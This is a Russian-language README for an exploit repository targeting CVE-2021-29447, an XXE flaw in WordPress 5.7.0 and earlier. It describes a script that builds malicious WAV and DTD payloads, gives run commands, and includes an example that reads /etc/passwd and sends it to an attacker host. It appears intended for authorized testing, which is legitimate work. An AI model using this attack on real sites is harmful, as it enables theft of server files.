
Эксплойт для CVE-2021-29447, XXE-уязвимости в WordPress 5.7.0 и более ранних версиях. Создает вредоносные WAV-полезные нагрузки для чтения произвольных файлов сервера через внедрение внешних XML-сущностей. Включает тестовую среду Docker.
Этот репозиторий содержит эксплойт для CVE-2021-29447, XXE-уязвимости (XML External Entity) в WordPress 5.7.0 и более ранних версиях. Уязвимость существует в библиотеке medemblic, обрабатывающей WAV-файлы, что позволяет злоумышленнику читать произвольные файлы на сервере.
| Файл | Описание |
|---|---|
CVE-2021-29447.sh | Скрипт эксплуатации, генерирующий полезную нагрузку WAV и вредоносный DTD |
decode.php | PHP-скрипт для декодирования извлечённых данных (base64 + zlib) |
docker-compose.yml | Среда Docker с уязвимым WordPress для тестирования |
docker-compose up -d
chmod +x CVE-2021-29447.sh
./CVE-2021-29447.sh -l <LHOST> -p <LPORT> -f <целевой_файл>
Параметры:
-l IP атакующего (LHOST)-p Порт атакующего (LPORT)-f Путь к файлу для чтения на сервере-h Показать справкуПример:
./CVE-2021-29447.sh -l 192.168.1.100 -p 4444 -f /etc/passwd
Извлечённые данные будут закодированы в base64 и сжаты с помощью zlib. Чтобы декодировать их:
php decode.php
Эксплойт работает путём внедрения внешней сущности XXE в метаданные WAV-файла. Когда WordPress обрабатывает файл, XML-парсер разрешает внешнюю сущность, заставляя сервер выполнить HTTP-запрос к серверу атакующего с содержимым файла, закодированным в URL.
Данный код предназначен только для образовательных целей и авторизованного тестирования на проникновение. Не используйте на системах без явного разрешения.